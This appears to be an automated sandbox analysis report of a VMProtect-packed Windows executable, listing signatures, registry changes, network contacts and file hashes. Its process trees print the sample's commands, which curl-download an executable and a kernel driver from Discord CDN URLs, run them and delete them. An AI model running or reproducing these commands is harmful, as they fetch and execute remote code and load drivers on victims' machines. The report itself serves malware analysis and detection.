Analysis Overview
SHA256
3b0cf0a25f13296540bfcc2e891958adc7c8c7aa799cf4cc1988d79299f6c1c4
Threat Level: Shows suspicious behavior
The file 84dfe3e2c2c23431bf1016ea20d6c329 was found to be: Shows suspicious behavior.
Malicious Activity Summary
VMProtect packed file
Legitimate hosting services abused for malware hosting/C2
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Modifies registry class
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-22 10:27
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-22 10:27
Reported
2023-12-23 14:01
Platform
win7-20231215-en
Max time kernel
117s
Max time network
157s
Command Line
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 505abb4ea835da01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a883829c536588438b4279b7bc6c1930000000000200000000001066000000010000200000000cf0e6d239756ea8303cc2b061aa047457c58cbc73d3bea9904576f3eac61768000000000e8000000002000020000000201db8a2037c5f988f63a4c402365ce49c3b141f29abc6ee1f5b9aff8e71b5b690000000bbb39544056854dee4f15f4ff43ddc88a1d839116414f88df9c35e2bdd8fc4881b507f4814fc2e78adcc5ad20e878657c5169a586dd745afd10142f2dd92314215858a4bd91bd29c662dffaf569e676b61fbaf010be18c4fb9967b72871dd2a023575c2d6535b4b1dd7de8d24d72c6a5be245d4a6f78c4b58e7e6e7dc591cd7d3e294c77a0765d6a846f313120cb4d2640000000c3c0143f9df63691a54e5f218ff6d797fc865c42beca84e42e57914dc731f128b4bd44d7144a41deb4e02a3fc1bd8ef79ec592fe7ad1a63a4985457c8383d4f5 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\DOMStorage\discord.com | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "409501808" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{67022A31-A19B-11EE-BB33-CEEF1DCBEAFA} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\DOMStorage | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\DOMStorage\discord.com\NumberOfSubdomains = "1" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a883829c536588438b4279b7bc6c193000000000020000000000106600000001000020000000f351b51b4938c4ac1a099859c05beea91d6921ed4af44c7241f66a6426c2ef3d000000000e8000000002000020000000a96f5b046adc3fc20b6fd7c83db3b6dc5d1b4a99ff6b5523eea8701ebb3a62a620000000e1cb6549bd6758f5c98953bcf1b43f83f3d080137c78f768d4e4ffbb0a4124c640000000585fc869947fb830797ead543b73ef6690ebdf05dc5829b63315ab35ce1c51b4f83e3c72282f2e3a512abe281cc6426de61682aa2d8cf43c706ec3e67c79d1fe | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\84dfe3e2c2c23431bf1016ea20d6c329.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\84dfe3e2c2c23431bf1016ea20d6c329.exe
"C:\Users\Admin\AppData\Local\Temp\84dfe3e2c2c23431bf1016ea20d6c329.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Color C
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start https://discord.gg/7fhtVRZEC6
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://discord.gg/7fhtVRZEC6
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/882824212316835860/883920268165275648/Monke.exe --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/882824212316835860/883920352911163392/CongratsYouCrackedAUnprotectedInjector.sys --output C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2992 CREDAT:275457 /prefetch:2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /f /q C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /f /q C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\Monke.exe C:\Windows\GigaByteTech.sys >nul 2>&1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | discord.gg | udp |
| US | 162.159.133.234:443 | discord.gg | tcp |
| US | 162.159.133.234:443 | discord.gg | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
memory/1200-0-0x0000000077970000-0x0000000077972000-memory.dmp
memory/1200-2-0x000000013FD10000-0x0000000140669000-memory.dmp
memory/1200-3-0x0000000077970000-0x0000000077972000-memory.dmp
memory/1200-5-0x0000000077970000-0x0000000077972000-memory.dmp
memory/1200-7-0x00000000777C0000-0x0000000077969000-memory.dmp
memory/1200-6-0x000000013FD10000-0x0000000140669000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab8E7C.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar9062.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fb79b0c6031801495ec88c53591873c8 |
| SHA1 | 6da8d4be344df080f369b673d8dc531038e748fb |
| SHA256 | 40df25f6cd9b62f61422770cf9398a56694b55b3578b9a1f383e58be2d1828e4 |
| SHA512 | 4548c39f3934152c8b0065d1e498badc4b80dc8ea80d3e55be0d6e35fd48bfb2426d9156ac9c8217d44c1fd74a2682b4fc92964683441bcfcb96937cdc501331 |
memory/1200-418-0x000000013FD10000-0x0000000140669000-memory.dmp
memory/1200-421-0x00000000777C0000-0x0000000077969000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L6MCRSFJ\favicon[1].ico
| MD5 | ec2c34cadd4b5f4594415127380a85e6 |
| SHA1 | e7e129270da0153510ef04a148d08702b980b679 |
| SHA256 | 128e20b3b15c65dd470cb9d0dc8fe10e2ff9f72fac99ee621b01a391ef6b81c7 |
| SHA512 | c1997779ff5d0f74a7fbb359606dab83439c143fbdb52025495bdc3a7cb87188085eaf12cc434cbf63b3f8da5417c8a03f2e64f751c0a63508e4412ea4e7425c |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\d151rer\imagestore.dat
| MD5 | f23309bb5938b31f8df75c4023711cc4 |
| SHA1 | 47d31f46c196841a7dfb6a0fe6ea1fa7de2c8677 |
| SHA256 | 5e8aa83d7ba1f7ceb1fa5f8cd09fd750f6dcf75e209a66508adf103784fd1b0b |
| SHA512 | fa7c6145dfa6591f7376ce5ad51415ff64375120eb606c423d94eaf4ea492b2c66fd48e6050fcd400c6b9043b130ab0cea6a915fab1702f0bf84ebc49c5bd8f0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0c4e04e7eb975d25ae2fd723bd9d0211 |
| SHA1 | 576c83769f560a738e7f29d3686cb8cb505b6d49 |
| SHA256 | 42b740597a693b112b33a0baaa768f5e99fef8b10af542077ed3699554cc0619 |
| SHA512 | 28b372079a1ea00e136419974970f027a81e497c0441c995a1b40607df4c6e6217dbba32d946f73b437a3fa2999cf38c82344d2b42db48943e258071b45c7d59 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a531d6c5abe413f63819c0ca1dbeeb64 |
| SHA1 | e56f0b975c10700d18a47935281ebf8c4112ee74 |
| SHA256 | f2d30a99f1849894053e1ad2b562dd93b2090912e3dda94604b57d32ea5ae15d |
| SHA512 | 1dddb37c810c6238114e49ccff241468524d9dfdc4c2d5129a2990c1978cf6576c33e9fa2cd12602d76f632400852952b19a177768d2fb8a28744b19e8d49954 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bf6c4591251babaf17a09f05af4fdbaf |
| SHA1 | 02b5993293fa2b116e5e04c318e0397985dcfb42 |
| SHA256 | 481753b4d04fba059b38a73bc5981f0249d38f41eb7f4c6959e17b92d27665df |
| SHA512 | 8b79baa029f2dc58d38b4be6e71d464405ca1e2ca42387ec71840a2214fda6dba91b3c538a696905b12f44dbbc79d454e47dbb786dedc235b3d136bf084a2453 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bc7582e7c5ae1f6fba217bc3cf8f79e6 |
| SHA1 | e5ade1e265369a23a8f03f5f77cd1e6040ca23b8 |
| SHA256 | c0b0ca00303aa9fd01770644db131aceaa39b764da2127f6ef95578c61f8f46e |
| SHA512 | 3d82d50511eb4ccad7a19600999764985df77a777da02f1557285424632bd24248614e0d8ac3a7aa1eb480da290fea60bf73a7f393d34c7fb46359e6997ab6dc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a838aa441ec111781dd602eccdf285a3 |
| SHA1 | 8c4cca2ed8ad2d27fc5b25182e10f6c1997bb0e9 |
| SHA256 | 3332bdf808b6654a3f9f6f70ac3e73315f513b931d92c775230429da02167b68 |
| SHA512 | 945c32bebbb03ff631537247cb2714336f662c139db60d99856c2345f26e7157e4f74b3037e7ce661863b79a28481f6ac263f6ee1e22d0f609ab402ca0263d36 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 70bf6a1197fbe7c474e07f16edeb7aed |
| SHA1 | c81ab279a9136e578331082bc0e2d8e128dce01a |
| SHA256 | 48111d52ebf0dd03a893d92d6669c36232028eb81fa96ee1a2e80a3841122c84 |
| SHA512 | de2478e7d5dad55edc81f834be457e89d52310015c6e408cfbf2f7961346e78aa58f29df41a87131d8bae111303eed3c692def73a7d2dd672a25c4b934b21200 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2b78d4344c880e31eb612c356d516cab |
| SHA1 | 1739acdcc32d9c033620a2e68361396cd50512b3 |
| SHA256 | 7cef8cb87fc2f18150fe3de915b7eb2106dde2f79f8c4809ea0fe1993d3700b6 |
| SHA512 | a355c8dd11e57361bb6dfbbce0b450a6e8b1d4f306e106ae08391472e9f5f5b0368fd43db4d536e05a0956f7d8a32bb692efa394763c91de600794540cf663e9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6af8a20603ba345c39db33c665b7cee7 |
| SHA1 | ffaa471abe8b1c0aa1227d0be8b415e29b3f8f61 |
| SHA256 | 4597f49784f58d7495362702280a906242af5d7a0c7c7a28ea208772ff7b3b38 |
| SHA512 | a39bf9dd247973844372d7512f685a6662745416ec0f3ec4432ed81aebffde2507a75d3c7f17649c70028d6b30c432b733d255aa56706411f8ea5de76003f36f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 40b4b1762c66bdba356c11f643e4fcc0 |
| SHA1 | 325b643d63117cd147a2ac4b41639ca673def7fe |
| SHA256 | dd274fa908e1aa7c334d642504de653d69e102fe04a07e3907615cb8a40724e0 |
| SHA512 | dc692c8ef51547aa25d578223ae798c4349cae6208630450a6da4d5834d7d3947293620982821b0ef7e02bd7b4c4004d31f11facfd9a3564a385133eb9812452 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6ed7ce9cf4736b39cf2c798d9c277f94 |
| SHA1 | a0cbd403e798451ce5aa004c92966a1c2ff551a8 |
| SHA256 | 4e922dd1d8926adf719fb33586578736f3049bb8d4e613b66e4c39bb2d5f4a34 |
| SHA512 | 6e46157c8124324fcb88df04947c89784142afe3e5eb1d97853f5478e4850efa40fb7d68ad66ac0563899919f9b571f44f68db1a11fb8753590b68dc7da1f269 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c531922e68b5732f7e4cff3c346afd1b |
| SHA1 | 0284ed565f234f43ee14276720d0f13555866422 |
| SHA256 | 440009c51f99b16af1be2e7f6b038e21193794d8f151cedf9116692ff47cfa1f |
| SHA512 | 884dbc1c28acac51282a61bc39e5948cdf5b132dfa721edc68e58d582d9e5383575110fb81692655b933c0548acc3dcdc881406abc3fd6132db6e1b7e43d0fca |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e96a82ad354158cf3fbc1841e7ec450e |
| SHA1 | 8cc0022a4914cda1ebccd04fd9b34fc49c2cfacc |
| SHA256 | 47c6f28ce09bbe7fcae3fcfe79f4acee02093350a2aec5741bc035855fd7a854 |
| SHA512 | c89836f78e8bae31b08a017cffa0d47a37e5689eb985f5c2ccfdba0d7a3b6d34275fd4550e40e4f9f70c8db96405bd1023df097ff89f47958cddc2f8b06ac6ab |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d32a1145fa24e278d5b879a253ceaf1b |
| SHA1 | 7fad5b4eda72e52568e5c35d736240880ff61573 |
| SHA256 | fbe19914ca42686b96b4a28efdc2aed8061cb39e6cca6206180556f5669013e9 |
| SHA512 | 88a5f0c8202d5ffa241b7b00d820ad49be8830723b27059f031c6d9f5429bad5eedcbba546644ed30432df9e619e8beb0b97fd723420068c0a67491f622d1d3e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8dea5297d7eabe918bac7cecf7891382 |
| SHA1 | 57775c9efa3da6f9f6a1c66243655d8642863359 |
| SHA256 | e729135d7adfdb71ce3953ab89c5aee83a7801a22bb49a25377bfc6050f5c167 |
| SHA512 | 123c325c0264338f327e11f2fabc649032e1141ba9f0c37af10b7e31db65ab7ea61b2952d75c84abdbf43f694b7e5457353694caf0354064fc9448a825abc5be |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 083d06b1835da89231db9b894948b88a |
| SHA1 | b423b1298c9ba7e2205d7bc437256ffdb4cfc58e |
| SHA256 | 0eda52a83ea05ca6fd4e49a82f49bff856b59bda8d4f0991c63ffe790f5ae6eb |
| SHA512 | 1f2f1436ccf61d2ddf10ee279ee5802188cb4827e18a6725d96404953351b6398104106abd0bdc397e5a1c84b16ea868e8dd18436b19d995dabb0acabed36530 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 56772c8baf249b1fc374fe3c3eed862b |
| SHA1 | 79eafe858479fb3e6fc1656b2997a76e76a4b104 |
| SHA256 | ac38a0c100b6491f27875fe460d41dfbe31e5880dc87fc071cfc00f72b75bd2d |
| SHA512 | e9d0d5ca8f812649fb41a436d2649385f99bd95351b807ae6bb711ed79cabb579b9ff6b8f20c7d4280a83bee5ed5b0582240c73ea20bed9ca870e817e192c0fe |
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-22 10:27
Reported
2023-12-23 14:01
Platform
win10v2004-20231222-en
Max time kernel
147s
Max time network
149s
Command Line
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader1.exe | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\IME\CongratsYouCrackedAUnprotectedLoader.sys | C:\Windows\system32\curl.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3803511929-1339359695-2191195476-1000\{C2E60467-E04D-44D5-B9C0-E013DBFC1DBA} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\84dfe3e2c2c23431bf1016ea20d6c329.exe
"C:\Users\Admin\AppData\Local\Temp\84dfe3e2c2c23431bf1016ea20d6c329.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Color C
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start https://discord.gg/7fhtVRZEC6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/7fhtVRZEC6
